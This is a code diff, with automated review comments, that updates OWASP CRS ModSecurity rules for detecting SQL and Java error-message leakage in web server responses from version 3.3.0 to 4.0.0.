@@ -81,24 +76,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:ORA-[0-9][0-9][0-9][0-9]|java\.sql\.SQLException|Oracle error|Oracle.*Driver|Warning.*oci_.*|Warning.*ora_.*)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|CLI Driver.*DB2|DB2 SQL error|db2_\w+\()" \ "id:951130,\ phase:4,\ block,\ capture,\ t:none,\ msg:'DB2 SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-db2',\ 
@@ -106,24 +96,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:DB2 SQL error:|\[IBM\]\[CLI Driver\]\[DB2/6000\]|CLI Driver.*DB2|DB2 SQL error|db2_\w+\()" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinity of:)" \ "id:951140,\ phase:4,\ block,\ capture,\ t:none,\ msg:'EMC SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-emc',\ 
@@ -131,24 +116,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:\[DM_QUERY_E_SYNTAX\]|has occurred in the vicinity of:)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ "id:951150,\ phase:4,\ block,\ capture,\ t:none,\ msg:'firebird SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-firebird',\ 
@@ -156,25 +136,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)Dynamic SQL Error" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ +SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollback\." \ "id:951160,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Frontbase SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-frontbase',\ 
@@ -182,24 +156,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)Exception (?:condition )?\d+\. Transaction rollback\." \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ "id:951170,\ phase:4,\ block,\ capture,\ t:none,\ msg:'hsqldb SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-hsqldb',\ 
@@ -207,24 +176,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)org\.hsqldb\.jdbc" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statement|com\.informix\.jdbc|Exception.*Informix)" \ "id:951180,\ phase:4,\ block,\ capture,\ t:none,\ msg:'informix SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-informix',\ 
@@ -232,25 +196,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:An illegal character has been found in the statement|com\.informix\.jdbc|Exception.*Informix)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" -SecRule TX:sql_error_match "@eq 1" \ +SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)" \ "id:951190,\ phase:4,\ block,\ capture,\ t:none,\ msg:'ingres SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-ingres',\ 
@@ -258,25 +216,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:Warning.*ingres_|Ingres SQLSTATE|Ingres\W.*Driver)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ +SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command in statement)" \ "id:951200,\ phase:4,\ block,\ capture,\ t:none,\ msg:'interbase SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-interbase',\ 
@@ -284,24 +236,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:Warning: ibase_|Unexpected end of command in statement)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ "id:951210,\ phase:4,\ block,\ capture,\ t:none,\ msg:'maxDB SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-maxdb',\ 
@@ -309,24 +256,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:SQL error.*POS[0-9]+.*|Warning.*maxdb.*)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.|Conversion failed when converting the varchar value .*? to data type int\.)" \ "id:951220,\ phase:4,\ block,\ capture,\ t:none,\ msg:'mssql SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-mssql',\ 
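Review bot: The 951220 regex is edited by hand in this hunk (the `Conversion failed when converting the varchar value .*? to data type int\.` alternative is appended to the existing chain of alternations), while the neighbouring 951230 and 951240 regexes are now generated from regex-assembly sources with a header stating how to regenerate them. For consistency, and so that future additions go through the toolchain rather than editing a single 900-character line, consider moving this pattern to an equivalent regex-assembly source for 951220 and giving the rule the same generated-from header comment used for 951230. If that is deferred, a short comment above the rule noting that it is maintained by hand would stop the next contributor from assuming it is generated.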
@@ -334,24 +276,24 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)(?:System\.Data\.OleDb\.OleDbException|\[Microsoft\]\[ODBC SQL Server Driver\]|\[Macromedia\]\[SQLServer JDBC Driver\]|\[SqlException|System\.Data\.SqlClient\.SqlException|Unclosed quotation mark after the character string|'80040e14'|mssql_query\(\)|Microsoft OLE DB Provider for ODBC Drivers|Microsoft OLE DB Provider for SQL Server|Incorrect syntax near|Sintaxis incorrecta cerca de|Syntax error in string in query expression|Procedure or function .* expects parameter|Unclosed quotation mark before the character string|Syntax error .* in query expression|Data type mismatch in criteria expression\.|ADODB\.Field \(0x800A0BCD\)|the used select statements have different number of columns|OLE DB.*SQL Server|Warning.*mssql_.*|Driver.*SQL[ _-]*Server|SQL Server.*Driver|SQL Server.*[0-9a-fA-F]{8}|Exception.*\WSystem\.Data\.SqlClient\.)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/951230.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 951230 +# +SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid |SQL syntax.*)MySQL|Column count doesn't match(?: value count at row)?|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax(?:;| near)|MyS(?:QL server version for the right syntax to use|qlClient\.)|\[MySQL\]\[ODBC|(?:Table '[^']+' doesn't exis|valid MySQL resul)t|Warning.{1,10}mysql_(?:[\(-\)_a-z]{1,26})?|(?:ERROR [0-9]{4} \([0-9a-z]{5}\)|XPATH syntax error):" \ "id:951230,\ phase:4,\ block,\ capture,\ t:none,\ msg:'mysql SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-mysql',\ 
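Review bot: The new header comment says "run the following shell script", but what follows is a single `crs-toolchain regex update 951230` invocation, not a script; `# To update the regular expression run the following command` reads accurately. The same wording appears in the 951240 header in the next hunk, so both should be changed together.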
@@ -359,24 +301,24 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)(?:supplied argument is not a valid MySQL|Column count doesn't match value count at row|mysql_fetch_array\(\)|on MySQL result index|You have an error in your SQL syntax;|You have an error in your SQL syntax near|MySQL server version for the right syntax to use|\[MySQL\]\[ODBC|Column count doesn't match|Table '[^']+' doesn't exist|SQL syntax.*MySQL|Warning.*mysql_.*|valid MySQL result|MySqlClient\.)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +# Regular expression generated from regex-assembly/951240.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 951240 +# +SecRule RESPONSE_BODY "@rx (?i)P(?:ostgreSQL(?: query failed:|.{1,20}ERROR)|G::[a-z]*Error)|pg_(?:query|exec)\(\) \[:|Warning.{1,20}\bpg_.*|valid PostgreSQL result|Npgsql\.|Supplied argument is not a valid PostgreSQL .*? resource|(?:Unable to connect to PostgreSQL serv|invalid input syntax for integ)er" \ "id:951240,\ phase:4,\ block,\ capture,\ t:none,\ msg:'postgres SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-pgsql',\ 
@@ -384,24 +326,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i:PostgreSQL query failed:|pg_query\(\) \[:|pg_exec\(\) \[:|PostgreSQL.*ERROR|Warning.*pg_.*|valid PostgreSQL result|Npgsql\.|PG::[a-zA-Z]*Error|Supplied argument is not a valid PostgreSQL .*? resource|Unable to connect to PostgreSQL server)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/JDBCDriver|SQLite\.Exception|System\.Data\.SQLite\.SQLiteException)" \ "id:951250,\ phase:4,\ block,\ capture,\ t:none,\ msg:'sqlite SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-sqlite',\ 
@@ -409,24 +346,19 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)(?:Warning.*sqlite_.*|Warning.*SQLite3::|SQLite/JDBCDriver|SQLite\.Exception|System\.Data\.SQLite\.SQLiteException)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" - -SecRule TX:sql_error_match "@eq 1" \ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" + +SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.{2,20}sybase|Sybase.*Server message.*)" \ "id:951260,\ phase:4,\ block,\ capture,\ t:none,\ msg:'Sybase SQL Information Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-sybase',\ 
@@ -434,38 +366,34 @@ SecRule TX:sql_error_match "@eq 1" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/118/116/54',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ - chain" - SecRule RESPONSE_BODY "@rx (?i)(?:Sybase message:|Warning.*sybase.*|Sybase.*Server message.*)" \ - "capture,\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ - setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}',\ + setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'" +SecMarker "END-SQL-ERROR-MATCH-PL1" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951013,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:951014,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951015,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:951016,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is 
sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951017,phase:3,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:951018,phase:4,pass,nolog,skipAfter:END-RESPONSE-951-DATA-LEAKAGES-SQL" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf index 770624b2c5..33fcfae4c1 100644 --- a/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf +++ b/rules/RESPONSE-952-DATA-LEAKAGES-JAVA.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ 
@@ -13,10 +14,10 @@ -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952011,phase:3,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:952012,phase:4,pass,nolog,skipAfter:END-RESPONSE-952-DATA-LEAKAGES-JAVA" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # @@ -29,7 +30,7 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ capture,\ t:none,\ msg:'Java Source Code Leakage',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-java',\ tag:'platform-multi',\ @@ -38,11 +39,9 @@ SecRule RESPONSE_BODY "@pmFromFile java-code-leakages.data" \ tag:'OWASP_CRS',\ tag:'capec/1000/118/116',\ tag:'PCI/6.5.6',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'ERROR',\ - setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.error_anomaly_score}'" + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" # # -=[ Java Errors ]=- @@ -56,7 +55,7 @@ SecRule RESPONSE_BODY "@pmFromFile java-errors.data" \ capture,\ t:none,\ msg:'Java Errors',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ tag:'language-java',\ tag:'platform-multi',\ 
